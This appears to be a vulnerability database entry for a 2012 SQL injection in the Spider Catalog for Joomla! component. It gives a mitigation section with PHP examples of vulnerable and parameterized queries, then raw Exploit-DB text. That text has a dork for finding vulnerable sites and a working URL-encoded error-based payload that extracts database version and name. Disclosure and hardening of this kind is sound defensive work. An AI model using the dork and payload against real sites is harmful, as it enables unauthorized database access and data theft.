Vendor: Spider Catalog for Joomla!
By: Daniel Barragan 'D4NB4R'
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Spider Catalog for Joomla!
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:web-dorado:spider_catalog_for_joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux(Arch)-Windows(7ultimate)
2012

Joomla com_spidercatalog SQL injection Vulnerability

Spider Catalog for Joomla! is a convenient tool for organizing the products represented on your website into catalogs. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. Customers are provided with the possibility of rating the products available on the catalog, as well as writing customer reviews that will appear under the catalog products. Spider Catalog provides you with a high level of customization concerning almost all the aspects of the catalog, ranging from background colors and text size inside the product cell to the number of products in the row and the number of customer reviews per catalog page. The vulnerability is caused by improper sanitization of user-supplied input in the 'product_id' parameter of the 'index.php' script when handling a query string.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to modify the intended SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.
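As an added illustration of that mitigation (this is not the component's own code), a hypothetical PHP product lookup written in the vulnerable style, beside two safe rewrites: one with the Joomla 2.5/3.x database API and one with a PDO prepared statement. The table and column names, and the `jos_` prefix, are assumptions.

```php
<?php
// Added example, not code from the Spider Catalog component: a hypothetical
// product lookup reconstructed to show the pattern behind the advisory
// (user-controlled product_id spliced into SQL) beside two safe rewrites.
// Table and column names (#__spidercatalog_product, id, name) are assumptions.

// VULNERABLE pattern: the raw query-string value is concatenated into the SQL,
// so a non-numeric product_id can change the meaning of the WHERE clause.
function getProductUnsafe($db, $rawProductId)
{
    $sql = "SELECT * FROM #__spidercatalog_product WHERE id = '" . $rawProductId . "'";
    $db->setQuery($sql);
    return $db->loadObject();
}

// HARDENED (Joomla 2.5/3.x API): JInput::getInt() casts the value to an integer
// before use, and the (int) cast in where() re-applies that guarantee, so no
// quote character or operator can ever reach the query text.
function getProductSafe()
{
    $app = JFactory::getApplication();
    $db  = JFactory::getDbo();
    $productId = $app->input->getInt('product_id', 0);
    if ($productId <= 0) {
        return null; // reject missing or non-positive ids instead of querying
    }
    $query = $db->getQuery(true)
        ->select($db->quoteName(array('id', 'name')))
        ->from($db->quoteName('#__spidercatalog_product'))
        ->where($db->quoteName('id') . ' = ' . (int) $productId);
    $db->setQuery($query);
    return $db->loadObject();
}

// HARDENED (plain PDO, for non-Joomla code paths): allow-list validation plus a
// bound parameter, so the database never parses the id as part of the statement.
function getProductPdo(PDO $pdo, $rawProductId)
{
    if (!preg_match('/^\d+$/', (string) $rawProductId)) {
        return null; // only an unsigned integer is accepted
    }
    $stmt = $pdo->prepare('SELECT id, name FROM jos_spidercatalog_product WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawProductId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_OBJ) ?: null;
}
```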

Exploit-DB raw data:

 1               #########################################              1
 0               I'm D4NB4R member from Inj3ct0r Team                   1
  1               #########################################              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 #Exploit Title: Joomla com_spidercatalog SQL injection Vulnerability

 Dork: inurl:index.php?option=com_spidercatalog
 
 Date: [31-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://www.web-dorado.com/

 Demo: http://www.web-dorado.com/products/joomla-catalog.html
 
 Version: 1.1 (last update on Sep 25, 2012)
 
 License: GPLv2 or later Commercial
 
 Tested on: [Linux(Arch)-Windows(7ultimate)]

 
 Description: 

Spider Catalog for Joomla! is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. Customers are provided with the possibility of rating the products available on the catalog, as well as writing customer reviews that will appear under the catalog products. Spider Catalog provides you with a high level of customization concerning almost all the aspects of the catalog, ranging from background colors and text size inside the product cell to the number of products in the row and the number of customer reviews per catalog page.


 Vulnerable Parameter Name: 

                                  product_id

 Parameter Type: 

                                  Query string 


 Attack Pattern:

                                  -{Valid id}%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1 



 Exploit Demo: 

    SQLi : SQL injection

           http://localhost/index.php?option=com_spidercatalog&product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1



  Greetz:  All Member Inj3ct0r  Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha
  * shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic
  * Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel
  * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects
  * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe
  * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te


_____________________________________________________
Daniel Barragan "D4NB4R" 2012